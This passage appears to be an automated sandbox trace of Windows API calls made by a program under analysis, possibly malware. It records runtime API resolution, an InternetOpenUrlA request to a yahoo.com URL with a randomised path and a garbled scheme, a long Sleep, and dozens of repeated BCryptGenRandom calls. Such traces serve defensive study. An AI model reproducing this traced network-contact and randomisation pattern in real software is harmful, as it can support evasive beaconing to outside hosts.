returned="vá,\x0bs://www.yahoo.com/ZxoaPpnlhckt79oyakcdhz35Zrn3arik7Uvp5/fzgijkk2rmbRfsv4rmoyktbVrxigcktBhdyweydN5ep1Wbr/9geobkci6729cX7o9ccfwsSsyDdyGYn9Alk54Kohkj0Go3s/y29dJQqcb504XgdH/xcdoP3vt8hsS75byiviLAl9Rhxhwyiirb17ujJoMUxxkwxN/" [0193.153] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0193.154] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="vá,\x0bs://www.yahoo.com/ZxoaPpnlhckt79oyakcdhz35Zrn3arik7Uvp5/fzgijkk2rmbRfsv4rmoyktbVrxigcktBhdyweydN5ep1Wbr/9geobkci6729cX7o9ccfwsSsyDdyGYn9Alk54Kohkj0Go3s/y29dJQqcb504XgdH/xcdoP3vt8hsS75byiviLAl9Rhxhwyiirb17ujJoMUxxkwxN/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0193.154] GetProcessHeap () returned 0x440000 [0193.154] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x473770 | out: hHeap=0x440000) returned 1 [0193.154] GetProcessHeap () returned 0x440000 [0193.154] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x3a03250 | out: hHeap=0x440000) returned 1 [0193.154] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0193.154] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0193.154] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.154] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0193.155] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0193.155] Sleep (dwMilliseconds=0x19f82) [0193.389] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.389] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0193.389] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.389] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0193.389] GetProcessHeap () returned 0x440000 [0193.389] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0xf7) returned 0x3a01650 [0193.390] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.390] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0193.390] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.390] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a01651, cbBuffer=0x2f, dwFlags=0x2 | out: pbBuffer=0x3a01651) returned 0x0 [0193.390] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.390] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0193.391] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.391] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0193.391] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.391] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0193.391] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.391] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0193.391] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.391] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0193.392] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.392] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0193.392] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.392] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0193.392] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.392] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0193.393] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.393] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0193.393] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.393] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0193.393] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.393] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0193.394] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.394] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0193.394] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.394] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0193.394] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.394] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0193.394] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.394] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0193.395] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.395] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0193.395] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.395] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0193.395] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.395] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0193.395] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.395] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0193.396] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.396] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0193.396] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.396] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0193.396] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.396] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0193.397] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.397] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0193.397] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.397] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0193.398] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.398] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0193.398] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.398] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0193.398] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.398] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0193.398] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.398] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0193.399] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.399] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0193.399] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.399] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0193.399] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.399] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0193.399] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.400] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0193.400] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.400] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0193.400] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.400] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0193.400] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.400] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0193.401] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.401] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0193.402] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.402] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0193.402] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.402] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0193.403] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.403] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a01680, cbBuffer=0x25, dwFlags=0x2 | out: pbBuffer=0x3a01680) returned 0x0 [0193.403] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.403] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0193.403] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.403] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0193.403] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.403] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0193.404] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.404] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0193.615] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.615] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0193.616] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.616] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0193.616] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.616] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0193.616] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.616] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0193.616] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.616] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0193.617] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.617] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0193.617] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.617] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0193.617] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.617] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0193.618] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.618] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0193.618] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.618] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0193.618] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.618] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0193.619] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.619] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0193.619] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.619] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0193.619] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.619] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0193.623] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.624] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0193.624] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.624] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0193.624] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.624] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0193.624] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.625] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0193.625] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.625] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0193.625] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.625] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0193.625] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.625] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0193.625] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.626] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0193.626] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.626] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0193.626] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.626] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0193.626] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.626] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a016a5, cbBuffer=0x2d, dwFlags=0x2 | out: pbBuffer=0x3a016a5) returned 0x0 [0193.627] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.627] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0193.627] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.627] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0193.627] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.628] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0193.628] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.628] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0193.628] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.628] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0193.628] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.628] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0193.629] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.629] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0193.629] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.629] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0193.629] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.629] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0193.629] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.629] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0193.630] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.630] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0193.630] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.630] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0193.630] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.630] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0193.631] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.631] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0193.631] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.631] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0193.631] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.631] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0193.631] GetProcAddress (hModule=0x7ffc5bcc0000, 